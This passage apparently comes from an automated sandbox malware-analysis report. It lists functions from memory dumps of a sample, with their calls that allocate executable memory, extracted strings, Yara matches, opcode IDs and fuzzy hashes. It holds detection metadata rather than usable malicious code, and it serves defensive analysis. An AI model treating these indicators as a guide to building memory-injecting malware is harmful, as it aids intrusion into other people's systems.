                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: IQPS$Y=Y?$qw$uk
                                              • API String ID: 0-3965859587
                                              • Opcode ID: f7be5749a5b58e2cc3b508d5bf0a65a67ce16adbd5ef003d977847e3760ef88f
                                              • Instruction ID: c13108cdc038a3dcfa55a7536e8cff8fa4c5d81cf29e907e2243abdabd9cb134
                                              • Opcode Fuzzy Hash: f7be5749a5b58e2cc3b508d5bf0a65a67ce16adbd5ef003d977847e3760ef88f
                                              • Instruction Fuzzy Hash: 1ED138B4600B419BD324CF25D491753FBB1BF46304F148A5CD8A68BB86D334E999CBD8
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006E5417 Relevance: 3.9, Strings: 3, Instructions: 116COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: P4@$P4@$p4@
                                              • API String ID: 0-2199205690
                                              • Opcode ID: 076a281b47144c3ac77265214b062b38a2854ec1666f9654a066a412db6bd952
                                              • Instruction ID: 7dfe8c25eedf065226f00a774ea048037986e564cb8c77fdcc1813c2d91bc8bc
                                              • Opcode Fuzzy Hash: 076a281b47144c3ac77265214b062b38a2854ec1666f9654a066a412db6bd952
                                              • Instruction Fuzzy Hash: E741A1B1611B448BDB18CF1AC8C475237E2AF84329F58C0A9DD028F78AD779C989CF81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$GetProcAddress.$l
                                              • API String ID: 0-2784972518
                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction ID: 00360f923b02206ba4e0abf178a40f94604574d281b8d41a332c48d6b120a506
                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction Fuzzy Hash: 343139B6901749DFEB10CF99C884AADBBF6FF48324F14504AD441A7312D7B1EA85CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00405700 Relevance: 3.4, Strings: 2, Instructions: 867COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$8
                                              • API String ID: 0-46163386
                                              • Opcode ID: 13fd5802931d0de33f504ea7c591f14101949059d373c8000e43e9c38a0c0259
                                              • Instruction ID: 3944dc6371330bf47b284e3479ab6204edcfc66dbba30dec607243105356592b
                                              • Opcode Fuzzy Hash: 13fd5802931d0de33f504ea7c591f14101949059d373c8000e43e9c38a0c0259
                                              • Instruction Fuzzy Hash: 428233716083419FD720CF28C880B9BBBE1AF88314F14892EF8999B391D779D954DF96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FA097 Relevance: 3.3, APIs: 2, Instructions: 330nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 006FA3D0
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006FA419
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 45ca6c8b52c7945cd4000329464f479dbb13c57cdebb73670de01e2d8e68058c
                                              • Instruction ID: 400a8f8389c9e959e212f9d7095a489eed850c30e85389aeec269b9d058510ed
                                              • Opcode Fuzzy Hash: 45ca6c8b52c7945cd4000329464f479dbb13c57cdebb73670de01e2d8e68058c
                                              • Instruction Fuzzy Hash: F2A1D0B15083158BDB10DF54C842BBA73F2EF81324F09492CEA998B390E775E905CB97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00718417 Relevance: 3.2, APIs: 2, Instructions: 229nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00718533
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00718594
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: ee5c6596bc607baf826687c62190f65d39e3832d480b2c6899ec3ae65ebca079
                                              • Instruction ID: eb6be1cc98cdbbe33bd20142a5f6e62944e3bce4d0d4c7a5816761033f3277f8
                                              • Opcode Fuzzy Hash: ee5c6596bc607baf826687c62190f65d39e3832d480b2c6899ec3ae65ebca079
                                              • Instruction Fuzzy Hash: A481C2715083519FC315CF28C880A6BFBE5AFD5318F19862CF89987392DB78D945CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00703E7D Relevance: 3.2, APIs: 2, Instructions: 175COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2946a785a7335dce04309b2b89095e2828e62c30e1c85b38bab3a1f00ec962b8
                                              • Instruction ID: f80ceb456aeb1a5ea994331d4b78738500db42a61bc63d3334432e042865c150
                                              • Opcode Fuzzy Hash: 2946a785a7335dce04309b2b89095e2828e62c30e1c85b38bab3a1f00ec962b8
                                              • Instruction Fuzzy Hash: F451BF75544B828FD725CF24C814BA2BBF4BB46308F184A6DD1EBCB292DB78B509CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FA981 Relevance: 3.2, APIs: 2, Instructions: 170nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FAB30
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FAB8C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 082dbad38d3ba6fb83ba1681b206c15d9d29b39d061a9f39a0ef98299718129f
                                              • Instruction ID: 2c9dbf7ebd96299b53bc55ebe5f0a5d626b93c639aa0ef38fbfc69ad3369bebe
                                              • Opcode Fuzzy Hash: 082dbad38d3ba6fb83ba1681b206c15d9d29b39d061a9f39a0ef98299718129f
                                              • Instruction Fuzzy Hash: CE5129725087908FD325CF18C890B6ABBE1BB85314F09866CE9FA973D1C734D908CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0070290B Relevance: 3.2, Strings: 2, Instructions: 657COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ido1$kvri
                                              • API String ID: 0-1372408504
                                              • Opcode ID: f65a3c888cac63b7f75acb57a02f369a9874bfff2bca6b5a80168ecacc476a3f
                                              • Instruction ID: 96564d6273c67ba805181d0be9a2ca98394e4a970a59f510d69de36d61bcb532
                                              • Opcode Fuzzy Hash: f65a3c888cac63b7f75acb57a02f369a9874bfff2bca6b5a80168ecacc476a3f
                                              • Instruction Fuzzy Hash: F0324D70144B928AE725CB34C498BE3BBE1AF16309F044A6DD4FB8B283D779654ACB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0070290E Relevance: 3.1, Strings: 2, Instructions: 645COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ido1$kvri
                                              • API String ID: 0-1372408504
                                              • Opcode ID: 97d47b0abb8866480f44754dc735a4b115dcf3b84d48fbb1c07c0b21aa749e4a
                                              • Instruction ID: 86855c0ea6550c01114970bd1b4b94f48ae981f7cc34897ea8b9019a55a83153
                                              • Opcode Fuzzy Hash: 97d47b0abb8866480f44754dc735a4b115dcf3b84d48fbb1c07c0b21aa749e4a
                                              • Instruction Fuzzy Hash: 67324D70144B928AE726CF34C498BE3BBE1AF16309F04496DD4FB8B283D779654ACB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00702255 Relevance: 3.1, Strings: 2, Instructions: 624COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ido1$kvri
                                              • API String ID: 0-1372408504
                                              • Opcode ID: 8ce99b25c8e92c780c8398b980d499503a4318c2435ec1036843c074f629d874
                                              • Instruction ID: f630426f979158805daf7a8a99d007512fea1d86f46a7eee2c6d2f5485f05ea7
                                              • Opcode Fuzzy Hash: 8ce99b25c8e92c780c8398b980d499503a4318c2435ec1036843c074f629d874
                                              • Instruction Fuzzy Hash: AD222A70144B828AE726CF34C494BE2BBE1BF16308F544A6DD0FB8B683D779654ACB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00712B57 Relevance: 3.1, APIs: 2, Instructions: 110nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00712C59
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00712CAC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8c40ab01cc09802f46cf35142ebcf66c07ac878455954d87856e22ef8e907354
                                              • Instruction ID: 9bee77e16d600c202434763d09926ea7d12558f8b64b19bd09dadda04dc59b88
                                              • Opcode Fuzzy Hash: 8c40ab01cc09802f46cf35142ebcf66c07ac878455954d87856e22ef8e907354
                                              • Instruction Fuzzy Hash: BF3149B11083049FE714CF08C854B5BBBE4EB85358F148A2CF4A99B2D1E779D949CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004328F0 Relevance: 3.1, APIs: 2, Instructions: 110nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004329F2
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00432A45
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8c40ab01cc09802f46cf35142ebcf66c07ac878455954d87856e22ef8e907354
                                              • Instruction ID: 630e8df523fa24365d988a07fb3963ad9a2578550b726720262826eedc18132f
                                              • Opcode Fuzzy Hash: 8c40ab01cc09802f46cf35142ebcf66c07ac878455954d87856e22ef8e907354
                                              • Instruction Fuzzy Hash: 64313BB12083049FE714CF05C944B5FBBE4EF89358F148A2DF4A99B390D7B59909CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F3957 Relevance: 3.1, APIs: 2, Instructions: 105nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006F3F66
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006F3FCD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 955dae054f5160a71a8c9ee6e973716698318e9fb30d1cf8952eb4a9c188ffb6
                                              • Instruction ID: c99819a869b22bfe9189757c01eb6868686d84c78f56f34b0e95b4320bf61184
                                              • Opcode Fuzzy Hash: 955dae054f5160a71a8c9ee6e973716698318e9fb30d1cf8952eb4a9c188ffb6
                                              • Instruction Fuzzy Hash: F5316D75240B108FE724CF24C840B6677E5EB49324F248A2CD6AB9BBE0D771B805CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004136F0 Relevance: 3.1, APIs: 2, Instructions: 105nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00413CFF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00413D66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 955dae054f5160a71a8c9ee6e973716698318e9fb30d1cf8952eb4a9c188ffb6
                                              • Instruction ID: 21eb2697629b630e83246217d921541e3c59abb72e668720b3aeedc93f2f2766
                                              • Opcode Fuzzy Hash: 955dae054f5160a71a8c9ee6e973716698318e9fb30d1cf8952eb4a9c188ffb6
                                              • Instruction Fuzzy Hash: BD316975240B008FE324CF24D880B5677E5EB49324F248A2CE6ABDBBE0D775B845CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F78D7 Relevance: 3.1, APIs: 2, Instructions: 100nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 006F79B7
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000010,00008000), ref: 006F7A1F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: d9594c6ddb305b903f30f84e4b86404cb2dbae670454285bf974dc73d80ebd2f
                                              • Instruction ID: 735d3527ffca49e2ffb687e9ac96b2d956c85b4227135fafc10d41fcea910679
                                              • Opcode Fuzzy Hash: d9594c6ddb305b903f30f84e4b86404cb2dbae670454285bf974dc73d80ebd2f
                                              • Instruction Fuzzy Hash: 42317E752083419FE714CF14C844B6AB7E5FBC9314F148A2CE6A9DB3E1DB749809CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00417670 Relevance: 3.1, APIs: 2, Instructions: 100nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00432120: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004321B4
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 00417750
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000010,00008000), ref: 004177B8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: AllocateMemoryVirtual$FreeHeap
                                              • String ID:
                                              • API String ID: 2385414463-0
                                              • Opcode ID: 375d12db5c11158649309a1c01c856e34b76c39b6669aef9d4ab46117e80865c
                                              • Instruction ID: 0ce15bc2498f235bc05f3c00611671d7869645051154cf2f7f772c77464e27e6
                                              • Opcode Fuzzy Hash: 375d12db5c11158649309a1c01c856e34b76c39b6669aef9d4ab46117e80865c
                                              • Instruction Fuzzy Hash: 9031AD752087408FE714CF18C844B6BB7E5FB89314F148A2DE6A9CB3E0DB749809CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F33AC Relevance: 3.1, APIs: 2, Instructions: 95nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006F4053
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006F40A2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 9bf40b4569f0c21100635e816a9cd546978a5b0228d36040ec449cc62cb513ca
                                              • Instruction ID: be9ae3bc8bdd74f6c0fb798264c08eb65f756b84ffbb12f7481fb5d26f8e721f
                                              • Opcode Fuzzy Hash: 9bf40b4569f0c21100635e816a9cd546978a5b0228d36040ec449cc62cb513ca
                                              • Instruction Fuzzy Hash: BB317075100B008FE724CF28C844B5A77F5FB48304F148A2CE6AB8B7A0D776E945CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00413145 Relevance: 3.1, APIs: 2, Instructions: 95nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00413DEC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00413E3B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 9bf40b4569f0c21100635e816a9cd546978a5b0228d36040ec449cc62cb513ca
                                              • Instruction ID: c06454d7773366c128b88dccc3ec436e56a8a3480ed7697c2bbc442290591d12
                                              • Opcode Fuzzy Hash: 9bf40b4569f0c21100635e816a9cd546978a5b0228d36040ec449cc62cb513ca
                                              • Instruction Fuzzy Hash: C131AF75240B008FE724CF28D840B5A77F5FB48304F048A2CE6AB8BBA0D775E849CB84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00717427 Relevance: 3.1, APIs: 2, Instructions: 94nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 007174CC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00717524
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8658342b72303bdb5dcf044743d588e8f186c13abbcc6335f68c62d6f4af87bf
                                              • Instruction ID: a615c9266439a915f23d97506fccb7f4f9cd3fe0f1da946b889329629cd77620
                                              • Opcode Fuzzy Hash: 8658342b72303bdb5dcf044743d588e8f186c13abbcc6335f68c62d6f4af87bf
                                              • Instruction Fuzzy Hash: 5B318175108705AFD714CF08D844B9EBBE8EB85324F00862CF9A4973D1E774D948CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006F690E Relevance: 3.1, APIs: 2, Instructions: 93nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 006F69C3
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 006F6A18
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 4d1564886dd15fbc451907a0650df2c02c7b50044f79724ef898f624542a511d
                                              • Instruction ID: 13ff946a4b9bc756991bafc99ad20709fb476a852cdabe4d2203decdca26573a
                                              • Opcode Fuzzy Hash: 4d1564886dd15fbc451907a0650df2c02c7b50044f79724ef898f624542a511d
                                              • Instruction Fuzzy Hash: B4319AB56187448FD714CF28C840B6AB7E5FB88318F144A2CF5A99B3A0D774D904CB8A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FDCEB Relevance: 3.1, APIs: 2, Instructions: 93nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FDD95
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FDDE4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 158884f2b32dd0cf146f0035c1af637db578379ed14bc00a3b096cb4a9d2a651
                                              • Instruction ID: 5af6622361df7ae07fb97e7f4efb63ff1e2f741be4e235232e570172a7e0ff41
                                              • Opcode Fuzzy Hash: 158884f2b32dd0cf146f0035c1af637db578379ed14bc00a3b096cb4a9d2a651
                                              • Instruction Fuzzy Hash: 75312675210B148FD734CF24C884B56B7F6FB09318F448A2CDAAA87B90D771B809CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00712DC7 Relevance: 3.1, APIs: 2, Instructions: 93nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00712E8C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00712ED6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: fc214ef5ae3b6e8d171668c5d73ee056851389741c8a885e068136cc23099b51
                                              • Instruction ID: c322b0c5ff65f9897142fed941101916d90a11229ebee22028b6dfa200c8d151
                                              • Opcode Fuzzy Hash: fc214ef5ae3b6e8d171668c5d73ee056851389741c8a885e068136cc23099b51
                                              • Instruction Fuzzy Hash: 7231B171204300AFD714CF18C848B5E77E4EB85318F14852CE9A99B3D1D775888DCB97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00432B60 Relevance: 3.1, APIs: 2, Instructions: 93nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00432C25
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00432C6F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: fc214ef5ae3b6e8d171668c5d73ee056851389741c8a885e068136cc23099b51
                                              • Instruction ID: 5b9ed0d47774f8385766d8461fb0e252f125b3ef58cb4fe83cd954a34667a81e
                                              • Opcode Fuzzy Hash: fc214ef5ae3b6e8d171668c5d73ee056851389741c8a885e068136cc23099b51
                                              • Instruction Fuzzy Hash: A131B1712043019FE714CF14C944B1FB7E4EB89318F14952DE5A88B3D0D7B59849CBD6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 006FDE4E Relevance: 3.1, APIs: 2, Instructions: 92nativememoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FDF1E
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FDF71
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
